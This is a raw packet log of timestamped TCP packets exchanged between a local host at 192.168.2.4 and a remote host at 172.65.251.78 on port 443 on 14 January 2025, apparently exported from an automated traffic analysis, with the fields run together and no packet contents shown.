                                                                                                                                                                                                        Jan 14, 2025 12:40:25.657684088 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.657742023 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.742468119 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.742647886 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.742651939 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.742722988 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.742763042 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.742768049 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.742826939 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.742844105 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.742880106 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.742932081 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.742944956 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.742985964 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.742999077 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743014097 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743041039 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743146896 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743211031 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743223906 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743247032 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743298054 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743310928 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743386030 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743443966 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743457079 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743514061 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743515968 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743545055 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743575096 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743697882 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743750095 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743762970 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743801117 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743813992 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743829966 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743859053 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743927956 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743979931 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.743993998 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.744019032 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.744045973 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.744062901 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.744093895 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.744441986 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.744496107 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.744508028 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.744554996 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.744589090 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.744647026 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.744694948 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.744755030 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.744832039 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.744884014 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.744919062 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.744970083 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.745417118 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.745471001 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.745526075 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.745584965 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.745640039 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.745692968 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.745734930 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.745788097 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.745858908 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.745913982 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.746336937 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.746397018 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.746515036 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.746568918 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.746623039 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.746675968 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.829895973 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.829956055 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.830009937 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.830080986 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.830123901 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.830312014 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.830355883 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.830379963 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.830398083 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.830425978 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.830502987 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.830558062 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.830571890 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.830621004 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.830641985 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.830682993 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.830713034 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.830725908 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.830753088 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.830843925 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.830883980 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.830912113 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.830924988 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.830949068 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.831024885 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.831079960 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.831091881 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.831142902 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.831149101 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.831175089 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.831211090 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.831244946 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.831255913 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.831408024 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.831449032 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.831478119 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.831491947 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.831517935 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.831535101 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.831589937 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.831603050 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.831630945 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.831651926 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.831664085 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.831691980 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.837254047 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.837294102 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.837320089 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.837333918 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.837357998 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.837522984 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.837568998 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.837616920 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.837616920 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.837631941 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.888900042 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.916338921 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.916388035 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.916529894 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.916529894 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.916595936 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.916873932 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.916913986 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.916944027 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.916969061 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.916996956 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.917046070 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.917102098 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.917117119 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.917280912 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.917654991 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.917711020 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.917726994 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.917742968 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.917768955 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.917788982 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.918415070 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.918458939 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.918483973 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.918495893 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.918523073 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.918684006 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.918742895 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.918755054 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.918807030 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.919275999 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.919356108 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.919373989 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.919449091 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.919842958 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.919882059 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.919909000 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.919922113 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.919949055 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.920080900 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.920154095 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.920165062 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.920213938 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.920435905 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.920504093 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.920515060 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.920723915 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.920749903 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.920782089 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.920800924 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.920824051 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.920847893 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.920888901 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.920958996 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.920969963 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.921004057 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.921052933 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.921063900 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:25.921122074 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.004189014 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.004241943 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.004376888 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.004376888 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.004441023 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.004492044 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.005057096 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.005101919 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.005137920 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.005156994 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.005183935 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.005203962 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.005806923 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.005856037 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.005888939 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.005899906 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.005928040 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.005958080 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.006099939 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.006169081 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.006557941 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.006608009 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.006638050 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.006654978 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.006678104 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.006697893 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.007211924 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.007255077 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.007283926 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.007296085 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.007354975 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.007354975 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.007749081 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.007823944 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.007837057 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.007910967 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.007976055 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.007987976 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.008033037 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.008086920 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.008096933 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.008172989 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.008210897 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.008290052 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.008348942 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.008363008 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.008403063 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.008443117 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.008460045 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.008481979 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.008527994 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.008625984 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.008636951 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.060882092 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.090831041 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.090889931 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.091039896 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.091039896 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.091104031 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.091156960 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.091676950 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.091720104 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.091769934 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.091784000 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.091814995 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.091835022 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.092449903 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.092493057 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.092515945 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.092528105 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.092554092 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.092571020 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.093087912 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.093138933 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.093159914 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.093172073 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.093195915 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.093214989 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.094134092 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.094191074 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.094206095 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.094218969 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.094248056 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.094266891 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.094373941 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.094415903 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.094439030 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.094449997 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.094492912 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.094513893 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.094551086 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.094594955 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.094619036 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.094630003 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.094655991 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.094674110 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.094736099 CET44349778172.65.251.78192.168.2.4
